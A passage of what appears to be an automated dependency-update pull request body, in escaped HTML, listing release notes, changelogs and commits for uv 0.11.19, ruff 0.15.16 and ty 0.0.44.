href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-pc-windows-msvc.zip\"\u003euv-x86_64-pc-windows-msvc.zip\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex64 Windows\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-x86_64-pc-windows-msvc.zip.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-unknown-linux-gnu.tar.gz\"\u003euv-aarch64-unknown-linux-gnu.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003eARM64 Linux\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-aarch64-unknown-linux-gnu.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003ctr\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-unknown-linux-gnu.tar.gz\"\u003euv-i686-unknown-linux-gnu.tar.gz\u003c/a\u003e\u003c/td\u003e\n\u003ctd\u003ex86 Linux\u003c/td\u003e\n\u003ctd\u003e\u003ca href=\"https://releases.astral.sh/github/uv/releases/download/0.11.19/uv-i686-unknown-linux-gnu.tar.gz.sha256\"\u003echecksum\u003c/a\u003e\u003c/td\u003e\n\u003c/tr\u003e\n\u003c/tbody\u003e\n\u003c/table\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/uv/blob/main/CHANGELOG.md\"\u003euv's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.11.19\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-03.\u003c/p\u003e\n\u003ch3\u003ePython\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd CPython 3.15.0b2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAlways compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd PyEmscripten platform (PEP 783) (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19629\"\u003e#19629\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdd Pyodide 2025 target triple (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19653\"\u003e#19653\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMake preview features for commands have names that aren't ambiguous with the command (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19645\"\u003e#19645\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRespect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eContinue tool uninstall after dangling receipts (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19623\"\u003e#19623\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSkip Unix-specific installation steps when cross-installing Windows Python distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19424\"\u003e#19424\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.11.18\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-01.\u003c/p\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix performance regression in unzip of local wheels (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19637\"\u003e#19637\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePreview\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003euv check\u003c/code\u003e to run \u003ccode\u003ety\u003c/code\u003e from uv (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19605\"\u003e#19605\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate activation scripts with upstream fixes (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19628\"\u003e#19628\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump MSRV to 1.94 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/pull/19600\"\u003e#19600\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.11.17\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-05-28.\u003c/p\u003e\n\u003ch3\u003eEnhancements\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/7b2cff1c316eb3b7f52b1cc121d7e25eeea1b17c\"\u003e\u003ccode\u003e7b2cff1\u003c/code\u003e\u003c/a\u003e Bump version to 0.11.19 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19668\"\u003e#19668\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/ebd5033d77bca6a58c329cbbc351406a9415c920\"\u003e\u003ccode\u003eebd5033\u003c/code\u003e\u003c/a\u003e Fix setup-crates-io-publish call (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19667\"\u003e#19667\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/9abd9b122b963dc6d71a8b29729efa86b3b41d4c\"\u003e\u003ccode\u003e9abd9b1\u003c/code\u003e\u003c/a\u003e Respect \u003ccode\u003e--isolated\u003c/code\u003e in \u003ccode\u003euv check\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19666\"\u003e#19666\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/95507374d81bee4c6ffe55d9ccef60c5120e20b2\"\u003e\u003ccode\u003e9550737\u003c/code\u003e\u003c/a\u003e Use global preview in \u003ccode\u003eCondaEnvironmentKind::from_prefix_path\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19649\"\u003e#19649\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/b82cadf1555c23a0971bd660ed07fba223290aee\"\u003e\u003ccode\u003eb82cadf\u003c/code\u003e\u003c/a\u003e Remove more duplication in \u003ccode\u003eshow_settings\u003c/code\u003e tests (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19664\"\u003e#19664\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/d3cd632c83dbce8452cd2d4c3ccd8a3cd8ff5069\"\u003e\u003ccode\u003ed3cd632\u003c/code\u003e\u003c/a\u003e Always compute SHA256 for remote distributions (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19662\"\u003e#19662\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/48548c496e835a84c9a69d7d7e7d3b4b809fad8c\"\u003e\u003ccode\u003e48548c4\u003c/code\u003e\u003c/a\u003e Sync latest Python releases (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19531\"\u003e#19531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/8df759892cd54488c66a77852d7fc3f87a066f64\"\u003e\u003ccode\u003e8df7598\u003c/code\u003e\u003c/a\u003e fix feature-gates on \u003ccode\u003eformat\u003c/code\u003e and \u003ccode\u003echeck\u003c/code\u003e tests to specify they access r2 (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/1\"\u003e#1\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/68ae09e00cb4a1b7eb512b0ac77b79e4683cfaf4\"\u003e\u003ccode\u003e68ae09e\u003c/code\u003e\u003c/a\u003e Remove unused \u003ccode\u003epub\u003c/code\u003e code from workspace (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19565\"\u003e#19565\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/uv/commit/d4450f385074cd2a639e2525f44608c3c27f6414\"\u003e\u003ccode\u003ed4450f3\u003c/code\u003e\u003c/a\u003e Remove a bunch of duplication in \u003ccode\u003eshow_settings\u003c/code\u003e tests by using diffs (\u003ca href=\"https://redirect.github.com/astral-sh/uv/issues/19654\"\u003e#19654\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/uv/compare/0.11.7...0.11.19\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ruff` from 0.15.11 to 0.15.16\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/releases\"\u003eruff's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.16\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24644\"\u003e#24644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Narrow diagnostic range and exclude cases without exception handlers (\u003ccode\u003ePLW0717\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25440\"\u003e#25440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Treat \u003ccode\u003eyield\u003c/code\u003e before \u003ccode\u003ebreak\u003c/code\u003e from a terminal loop as terminal (\u003ccode\u003eRUF075\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25447\"\u003e#25447\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Avoid flagging \u003ccode\u003eruff:ignore\u003c/code\u003e comments as code (\u003ccode\u003eERA001\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25537\"\u003e#25537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Fix \u003ccode\u003eERA001\u003c/code\u003e/\u003ccode\u003eRUF100\u003c/code\u003e conflict when \u003ccode\u003enoqa\u003c/code\u003e is on commented-out code (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25414\"\u003e#25414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyflakes\u003c/code\u003e] Avoid removing the \u003ccode\u003eformat\u003c/code\u003e call when it would change behavior (\u003ccode\u003eF523\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25320\"\u003e#25320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Avoid syntax errors in invalid character replacements in f-strings before Python 3.12 (\u003ccode\u003ePLE2510\u003c/code\u003e, \u003ccode\u003ePLE2512\u003c/code\u003e, \u003ccode\u003ePLE2513\u003c/code\u003e, \u003ccode\u003ePLE2514\u003c/code\u003e, \u003ccode\u003ePLE2515\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25544\"\u003e#25544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Avoid converting \u003ccode\u003eformat\u003c/code\u003e calls with more kinds of side effects (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25484\"\u003e#25484\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Avoid fixes for ambiguous \u003ccode\u003eargnames\u003c/code\u003e and \u003ccode\u003eargvalues\u003c/code\u003e combinations (\u003ccode\u003ePT006\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24776\"\u003e#24776\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop excess capacity from statement suites during parsing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25368\"\u003e#25368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003epydocstyle\u003c/code\u003e] Improve discoverability of rules enabled for each convention (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24973\"\u003e#24973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Restore example code for Python versions before 3.15 (\u003ccode\u003eRUF017\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25439\"\u003e#25439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix typo \u003ccode\u003ebin/active\u003c/code\u003e → \u003ccode\u003ebin/activate\u003c/code\u003e in tutorial (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25473\"\u003e#25473\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Redslayer112\"\u003e\u003ccode\u003e@​Redslayer112\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/koriyoshi2041\"\u003e\u003ccode\u003e@​koriyoshi2041\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/George-Ogden\"\u003e\u003ccode\u003e@​George-Ogden\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TejasAmle\"\u003e\u003ccode\u003e@​TejasAmle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/loganrosen\"\u003e\u003ccode\u003e@​loganrosen\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RafaelJohn9\"\u003e\u003ccode\u003e@​RafaelJohn9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adityasingh2400\"\u003e\u003ccode\u003e@​adityasingh2400\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md\"\u003eruff's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.15.16\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003ePreview features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (\u003ccode\u003eASYNC119\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24644\"\u003e#24644\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Narrow diagnostic range and exclude cases without exception handlers (\u003ccode\u003ePLW0717\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25440\"\u003e#25440\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Treat \u003ccode\u003eyield\u003c/code\u003e before \u003ccode\u003ebreak\u003c/code\u003e from a terminal loop as terminal (\u003ccode\u003eRUF075\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25447\"\u003e#25447\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Avoid flagging \u003ccode\u003eruff:ignore\u003c/code\u003e comments as code (\u003ccode\u003eERA001\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25537\"\u003e#25537\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eeradicate\u003c/code\u003e] Fix \u003ccode\u003eERA001\u003c/code\u003e/\u003ccode\u003eRUF100\u003c/code\u003e conflict when \u003ccode\u003enoqa\u003c/code\u003e is on commented-out code (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25414\"\u003e#25414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyflakes\u003c/code\u003e] Avoid removing the \u003ccode\u003eformat\u003c/code\u003e call when it would change behavior (\u003ccode\u003eF523\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25320\"\u003e#25320\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epylint\u003c/code\u003e] Avoid syntax errors in invalid character replacements in f-strings before Python 3.12 (\u003ccode\u003ePLE2510\u003c/code\u003e, \u003ccode\u003ePLE2512\u003c/code\u003e, \u003ccode\u003ePLE2513\u003c/code\u003e, \u003ccode\u003ePLE2514\u003c/code\u003e, \u003ccode\u003ePLE2515\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25544\"\u003e#25544\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003epyupgrade\u003c/code\u003e] Avoid converting \u003ccode\u003eformat\u003c/code\u003e calls with more kinds of side effects (\u003ccode\u003eUP032\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25484\"\u003e#25484\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRule changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003eflake8-pytest-style\u003c/code\u003e] Avoid fixes for ambiguous \u003ccode\u003eargnames\u003c/code\u003e and \u003ccode\u003eargvalues\u003c/code\u003e combinations (\u003ccode\u003ePT006\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24776\"\u003e#24776\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePerformance\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eDrop excess capacity from statement suites during parsing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25368\"\u003e#25368\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eDocumentation\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003ccode\u003epydocstyle\u003c/code\u003e] Improve discoverability of rules enabled for each convention (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/24973\"\u003e#24973\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[\u003ccode\u003eruff\u003c/code\u003e] Restore example code for Python versions before 3.15 (\u003ccode\u003eRUF017\u003c/code\u003e) (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25439\"\u003e#25439\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix typo \u003ccode\u003ebin/active\u003c/code\u003e → \u003ccode\u003ebin/activate\u003c/code\u003e in tutorial (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25473\"\u003e#25473\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eOther changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eShrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/pull/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eContributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Redslayer112\"\u003e\u003ccode\u003e@​Redslayer112\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/koriyoshi2041\"\u003e\u003ccode\u003e@​koriyoshi2041\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/George-Ogden\"\u003e\u003ccode\u003e@​George-Ogden\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/TejasAmle\"\u003e\u003ccode\u003e@​TejasAmle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/anishgirianish\"\u003e\u003ccode\u003e@​anishgirianish\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ntBre\"\u003e\u003ccode\u003e@​ntBre\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MichaReiser\"\u003e\u003ccode\u003e@​MichaReiser\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/loganrosen\"\u003e\u003ccode\u003e@​loganrosen\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/RafaelJohn9\"\u003e\u003ccode\u003e@​RafaelJohn9\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/adityasingh2400\"\u003e\u003ccode\u003e@​adityasingh2400\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.15.15\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/6c498ab5394edc5622d7f348e12956bf86203716\"\u003e\u003ccode\u003e6c498ab\u003c/code\u003e\u003c/a\u003e Bump 0.15.16 (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25635\"\u003e#25635\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/e51e132831c4e1c4a5ac00fca4c9256354ab99bf\"\u003e\u003ccode\u003ee51e132\u003c/code\u003e\u003c/a\u003e [\u003ccode\u003eflake8-async\u003c/code\u003e] Implement \u003ccode\u003eyield-in-context-manager-in-async-generator\u003c/code\u003e (`AS...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/7c6dcd9f2611999c449143d241c582dedf287964\"\u003e\u003ccode\u003e7c6dcd9\u003c/code\u003e\u003c/a\u003e [ty] Add caching for pattern match narrowing (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25613\"\u003e#25613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/27058fc071b542bf06395ba89cabed061d313ca6\"\u003e\u003ccode\u003e27058fc\u003c/code\u003e\u003c/a\u003e [ty] Compact retained definition and expression identities (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25606\"\u003e#25606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/bf80d05f007c939799f530c9e775ed9449f5b2eb\"\u003e\u003ccode\u003ebf80d05\u003c/code\u003e\u003c/a\u003e Fix CODEOWNERS syntax (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25622\"\u003e#25622\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/10ccd511e94a81d1e836b174f1c553a73ff3f1b3\"\u003e\u003ccode\u003e10ccd51\u003c/code\u003e\u003c/a\u003e Shrink additional parser AST collections (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25465\"\u003e#25465\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/0d7135f4d23e7f4d8404daed16b9ef11d14f3fb9\"\u003e\u003ccode\u003e0d7135f\u003c/code\u003e\u003c/a\u003e [ty] Upgrade Salsa (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25545\"\u003e#25545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/49493a3cea83a08fa9aa143695017c816a540f1d\"\u003e\u003ccode\u003e49493a3\u003c/code\u003e\u003c/a\u003e [ty] Show type alias value on hover (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25381\"\u003e#25381\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/85207d3b7657a84252f266766cb0d56034dc21cc\"\u003e\u003ccode\u003e85207d3\u003c/code\u003e\u003c/a\u003e [ty] sys.implementation.version is not sys.version_info (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25608\"\u003e#25608\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/astral-sh/ruff/commit/a8a0614348c1fcf47fc9b666eff61a103914d520\"\u003e\u003ccode\u003ea8a0614\u003c/code\u003e\u003c/a\u003e [ty] Avoid retaining duplicate function signatures (\u003ca href=\"https://redirect.github.com/astral-sh/ruff/issues/25609\"\u003e#25609\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/astral-sh/ruff/compare/0.15.11...0.15.16\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ty` from 0.0.31 to 0.0.44\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/astral-sh/ty/releases\"\u003ety's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.0.44\u003c/h2\u003e\n\u003ch2\u003eRelease Notes\u003c/h2\u003e\n\u003cp\u003eReleased on 2026-06-04.\u003c/p\u003e\n\u003ch3\u003eBug 